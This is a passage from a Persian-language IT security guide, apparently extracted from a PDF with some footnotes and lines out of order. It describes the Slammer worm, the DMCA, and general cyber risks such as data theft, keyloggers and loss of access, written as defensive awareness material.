‫ﺩﻳﻮﻳﺪ ﻟﻴﭽﻔﻴﻠﺪ‪ ٤٨‬ﺩﺭ ﺟﻮﻻﻱ ﺳـﺎﻝ ‪ ۲۰۰۲‬ﻣـﻴﻼﺩﻱ ﺍﻳـﻦ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻧﻴـﺰ ﻗﺒـﻞ ﺍﺯ‬
‫ﺍﻧﺘــﺸﺎﺭ ﻛــﺮﻡ ‪ Slammer‬ﻭﺻــﻠﻪﺍﻱ ﺑــﺮﺍﻱ ﺍﺻــﻼﺡ ﺁﻥ‬
‫‪٤٩‬‬
‫ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ‪.‬‬
‫ﺩﻭﻡ‪ :‬ﻻﺯﻡ ﻧﻴﺴﺖ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺣـﻀﻮﺭ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺭﺍ ﺧﺪﺷـﻪﺩﺍﺭ ﻛﻨﻴـﺪ‪.‬‬
‫ﻼ ﻳﻚ ﻧﻔﺮ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﺜ ﹰ‬
‫ﻲ ﻛـﺴﻲ ﻛـﻪ ﺩﺭ ﻫﻨـﺪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﻫﺪﻑ ﺩﺭ ﻫﻨﺪ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧ ﹺ‬
‫ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻋـﺮﺽ ﻳـﻚ ﺧﻴﺎﺑـﺎﻥ ﺑـﺎ ﺁﻥ ﻫـﺪﻑ ﻓﺎﺻـﻠﻪ ﺩﺍﺭﺩ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ‪ .‬ﺗﻬﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻫـﺮ‬
‫ﺟﺎﻱ ﺷﺒﻜﻪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺑﻪ ﺳﻤﺖ ﻫﺪﻓﻲ ﻣﻌﻠـﻮﻡ ﻭ ﻣـﺸﺨﺺ‬
‫ﺟﻬﺖﮔﻴﺮﻱ ﻛﻨـﺪ؛ ﻭ ﻫـﺪﻑ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ‬
‫ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﺧﻄﺮﻧﺎﻙ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﻛـﻪ‬
‫ﻣﺎ ﻧﺤﻮﺓ ﺗﻔﻜﺮ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫـﻴﻢ‪ .‬ﻣـﻲﺗـﻮﺍﻥ‬
‫ﮔﻔﺖ ﺍﻳﻦ ﻫﻴﭻ ﺍﺭﺯﺷـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻳـﻴﻦﻧﺎﻣـﺔ ﺣـﻖ ﺗﻜﺜﻴـﺮ‬
‫‪ Digital Millennium‬ﻃﺮﺍﺣـﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗﻔـﻞﺷـﻜﻦ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻤﻴﺘﻪﻫﺎﻱ ﻣﻠﻲ ﻭ‬
‫ﺟﻬﺎﻧﻲ ﺣﻖ ﺗﻜﺜﻴﺮ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﻭ ﺳـﺎﻳﺮ ﻣـﻮﺍﺭﺩ ﻣـﺮﺗﺒﻂ ﺑـﻪ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﻫﻨﻮﺯ ﻣﺸﻐﻮﻝ ﺗـﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ‬
‫‪٥١‬‬
‫ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺳﻮﻡ‪ :‬ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺤﻴﻄـﻲ ﻗﺪﺭﺗﻤﻨـﺪ ﺍﻣـﺎ ﭘﻴﭽﻴـﺪﻩ ﺭﺍ ﺑﻮﺟـﻮﺩ‬
‫ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮ ﻋﻬﺪﺓ ﭼﻨﺪ ﺑﺎﺯﻳﮕﺮ ﺍﺳﺖ‪.‬‬
‫ﻼ ﺍﮔﺮ ﺷـﻤﺎ ﻳﻜـﻲ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﻳـﻚ ‪ ISP‬ﺑﺎﺷـﻴﺪ‪ ،‬ﺭﺍﻫﻬـﺎﻱ‬
‫ﻣﺜ ﹰ‬
‫ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺷﺨـﺼﻲﺗـﺎﻥ ﭘـﻴﺶِﺭﻭ‬
‫ﺩﺍﺭﻳﺪ؛ ﻫﺮﭼﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪ ISP‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﺧﻮﺩ ﻳﺎ ﻧﺤﻮﺓ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛ ﺣﺘﻲ‬
‫ﺍﮔﺮ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺰﺩﻳﻚ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻧﻬﺎ ﺑﺎﺷﻴﺪ‪ .‬ﭘﺲ ﺑﺎﻳﺪ ﻳـﻚ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻔﺎﻇﺘﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﺘـﺎﻥ ﺍﺗﺨـﺎﺫ ﻛﻨﻴـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ‬
‫ﻃﺒﻖ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﻛﺮﻡ ﻣﺬﻛﻮﺭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺣﺪﺍﻗﻞ ‪ ۷۵‬ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﺭﺍ ﺁﻟﻮﺩﻩ ﻛﺮﺩ‬
‫ ﻛﻪ ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺳﺖ ‪-‬‬‫ﻭ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺷﺪﻳﺪ ﺩﺭ ﻛـﺎﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺑـﺮﻭﺯ ﻧﺘـﺎﻳﺞ‬
‫‪Moore, Paxson, Savage, Shannon, Staniford‬‬
‫‪and Weaver,"Inside the Slammer Worm,"IEEE‬‬
‫‪Security and Privacy,Vol.1,No.4,July/August‬‬
‫‪2003, pp.33-39.‬‬
‫‪٥١‬‬
‫‪Hosts‬‬
‫‪Universal Time Coordinated‬‬
‫‪Buffer Overflow Vulnerability‬‬
‫‪David Litchfield‬‬
‫‪http://www.microsoft.com/security/‬‬
‫‪slammer.asp‬‬
‫‪45‬‬
‫‪46‬‬
‫‪47‬‬
‫‪48‬‬
‫‪49‬‬
‫ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻧﻈﺮﺍﺕ ﺟﺪﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺳﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﺮﺍﺟـﻊ‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪U.S. Copyright Office Digital Millennium‬‬
‫‪Copyright Act Study:‬‬
‫‪http://www.copyright.gov/reports/studies/dmca‬‬
‫‪/dmca_study.html‬‬
‫‪DMCA:‬‬
‫‪http://www.copyright.gov/legislation/hr2281.pdf‬‬
‫‪50‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺯﻳﺎﺩﻱ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺩﺭﺳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠـﺐ ﮔﺮﻓﺘـﻪ ﻣـﻲﺷـﻮﺩ ﺁﻥ‬
‫ﺍﺳﺖ ﻛﻪ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩ ﺑﺎﻳﺪ ﺍﺯ ﺍﺳﺘﻴﻼﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ‬
‫ﺗﺸﺨﻴﺺ ﻧﻘﺾ ﺣﺮﻳﻢ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻴﻦ ﻭﻗﻮﻉ ﺟﺮﻡ ﻳﺎ ﭘﺲ ﺍﺯ ﺁﻥ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩﺍﻱ ﭼﻮﻥ ﻟﻐﻮ ﭘﺮﻭﺍﺯﻫﺎﻱ ﻫﻮﺍﻳﻲ‪ ،‬ﺍﺧﺘﻼﻝ ﺩﺭ‬
‫ﺍﻧﺘﺨﺎﺑﺎﺕ‪ ،‬ﻭ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻝ ﺩﺭ ﻛﺎﺭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ‬
‫‪٥٠‬‬
‫ﺷﺪ‪.‬‬
‫‪٣٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻲﺩﺍﻧﻴﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺘﻮﺍﻧﻴـﺪ‬
‫ﺗﻤﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺧﻨﺜﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣﺨــﺎﻃﺮﺍﺕ ﻣﺤﺘﻤــﻞ ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﭼﻴــﺴﺘﻨﺪ؟ ﺍﮔــﺮ ﻫــﻴﭻ‬
‫ﻣﻼﺣﻈﺔ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺑﻌﻀﻲ ﻧﺘﺎﻳﺠﻲ ﻛـﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺗﺨﺮﻳﺐ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻻ ﺍﻣﻜـﺎﻥ‬
‫ﺷﻤﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺣـﺬﻑ ﺷـﻮﻧﺪ‪ .‬ﺍﻟﺒﺘـﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﻻ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻥﺑـﺮ ﻭ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻧﺎﻗﺺ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﺆﺳﺴﺔ ﺩﻭﻟﺘﻲ ﺑﺎﺷﻴﺪ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺘﺎﻥ ﺣﻴﻦ ﺍﻳﻦ ﺩﻭﺭﻩ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﺷﻮﺩ‪.‬‬
‫ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻘـﺾ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ‪ -‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺍﺯ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﻼﻓﺎﺻﻠﻪ ﻳـﺎ ﺑـﺎ ﺗـﺄﺧﻴﺮ ﻣﻄﻠـﻊ‬
‫ﺷﻮﻳﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﭼـﻪ ﻛـﺴﻲ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﮔﺮﻓﺘـﻪ‪ ،‬ﭼـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺍﻭﺳﺖ‪ ،‬ﻳﺎ ﺑﺎ ﺁﻧﻬﺎ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺍﻧﺠـﺎﻡ ﺧﻮﺍﻫـﺪ ﺩﺍﺩ‬
‫ﻼ ﻣﺠﺰﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺣﺠﻢ ﻭﺳﻴﻌﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ‬
‫ﻛﺎﻣ ﹰ‬
‫ﺷﻤﺎ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓﺘـﻪ ﺑﺎﺷـﺪ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ ﺳـﺎﺭﻕ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺠﻲ ﻧﺎﻣﻌﻠﻮﻡ ﻭ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺧﻄﺮﻧـﺎﻙ ﺩﺭ ﭘـﻲ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻧﻘﺾ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﺷﻤﺎ ﺗﻐﻴﻴﺮ ﻛﻨﻨـﺪ ﻭ ﺩﺳـﺘﻜﺎﺭﻱ‬
‫ﺷﻮﻧﺪ‪ .‬ﺑﺮ ﺍﺳﺎﺱ ﻧﻮﻉ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ‬
‫ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺳﺘﻜﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻘﻄﻌﻲ ﻳﺎ ﺩﺭﺍﺯﻣﺪﺕ ﺑﺎﺷـﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣـﺸﺘﺮﻳﺎﻥ‪،‬‬
‫ﻭﺿﻌﻴﺖ ﺳﻔﺎﺭﺷـﺎﺕ ﻳـﺎ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻘﺾ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺁﻧﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺴﻴﺎﺭ‬
‫ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺯﻳﺎﻧﺒﺎﺭ ﺑﺎﺷﺪ‪.‬‬
‫ﻧﻘﺾ ﺍﻧﺴﺠﺎﻡ ﺷﺒﻜﻪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‬
‫ ﻫﺮﭼﻨﺪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﻪ ﻃﻮﺭ ﻣﺴﺘﻘﻴﻢ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ‬‫ﻧﮕﺮﻓﺘﻪﺍﻳﺪ‪ ،‬ﻭﻟﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻛـﻪ ﺑـﻪ‬
‫ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻳﺪ ﻣﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ ﻭ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺷﻤﺎ ﻧﻴﺰ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﺪ‪ .‬ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﺍﮔـﺮ‬
‫ﻼ ﻳﻚ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﺑﺎﺷـﻴﺪ ﺣـﻴﻦ ﺩﻭﺭﺓ‬
‫ﻣﺜ ﹰ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺧـﻮﺩ‬
‫ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ‪.‬‬
‫ﺛﺒﺖ ﻛﻠﻴﺪﻫﺎ‪ -‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻨﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﻤﺎ ﻧﺼﺐ ﺷﻮﻧﺪ ﻛﻪ ﻓﺸﺮﺩﻩﺷﺪﻥ ﺩﻛﻤﻪﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ‬
‫ﺗﻮﺳﻂ ﺷﻤﺎ ﺭﺍ ﺛﺒﺖ ﻛـﺮﺩﻩ ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻳﮕـﺮ‬
‫ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ‬
‫‪٥٢‬‬
‫ﺧﺎﺭﺟﻲ ﻧﻈﻴﺮ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‬
‫ﻣﺤﺎﻓﻈﺖﺷﺪﻩ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻧﻘــﻞ ﻭ ﺍﻧﺘﻘــﺎﻻﺕ ﻣــﺎﻟﻲ‪ ،‬ﻭ ﻳــﺎ ﺩﺭﻳﺎﻓــﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﭼـﺎﺭ ﺍﺷـﻜﺎﻝ ﻛﻨـﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟـﺖ‬
‫ﺳﺎﺭﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،٥٣‬ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ‬
‫ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺩﺭ ﺁﻳﻨﺪﻩ‬
‫ﺑﺮﺍﻱ ﻣﻨﺎﻓﻊ ﺷﺨﺼﻲ ﺧﻮﺩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﻣﻨﻊ ﺩﺳﺘﺮﺳﻲ‪ - ٥٤‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﻣﺤﺮﻭﻡ ﺷـﻮﻳﺪ‪ ،‬ﺣﺘـﻲ ﺍﮔـﺮ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻼ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ‬
‫ﭘﺎﻙ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻗﺎﻟﺒﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩﺍﻱ ﻇﺎﻫﺮ ﺷـﻮﻧﺪ ﻭ ﺗﻨﻬـﺎ ﻣﻬـﺎﺟﻢ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻫﺰﻳﻨﺔ ﺗﺮﻣﻴﻢ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﻫـﺮ ﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺣﻤـﻼﺕ ﻗﺎﺑـﻞ‬
‫ﻣﻼﺣﻈﻪ ﺍﺳﺖ ﻭ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﺎﻣﻤﻜﻦ ﺑﻨﻈﺮ ﻣﻲﺁﻳـﺪ‪.‬‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻣﺪﻳﺮ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺩﺍﺩﻩﺍﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻭﺍﺑـﺴﺘﮕﻲ ﺷـﺪﻳﺪ ﺩﺍﺭﺩ‪ ،‬ﻳـﻚ ﺣﻤﻠـﺔ ﻣﺨـﺮﺏ‬
‫ﻣﻲ ﺗﻮﺍﻧﺪ ﻣﻮﺟﺐ ﻭﺭﺷﻜﺴﺘﮕﻲ ﻣﺆﺳﺴﻪ ﺷﻤﺎ ﮔﺮﺩﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﻛﺮﻡ ‪ Slammer‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺭﺍ ﺁﻟﻮﺩﻩ ﻣﻲﻛـﺮﺩ ﻛـﻪ‬
‫ﻭﺻﻠﺔ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺼﺐ ﻧﺸﺪﻩ ﺑﻮﺩ‪.‬‬
‫ﻳﻜــﻲ ﺍﺯ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻛــﻪ ﺑــﻴﺶ ﺍﺯ ﻳﻜــﺴﺎﻝ ﻓﻌﺎﻟﻴــﺖ‬
‫ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺩﺍﺷﺖ ﺭﻭﺷﻬﺎﻱ ﻧﻮﻳﻨﻲ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻛﺸﻴﺪ ﻛـﻪ ﺑـﺎ‬
‫ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩ‪:‬‬
‫" ﺁﺳﻮﺷﻴﺘﺪ ﭘـﺮﺱ )ﻧﻴﻮﻳـﻮﺭﻙ( ‪ -‬ﺑـﺮﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜـﺴﺎﻝ‪،‬‬
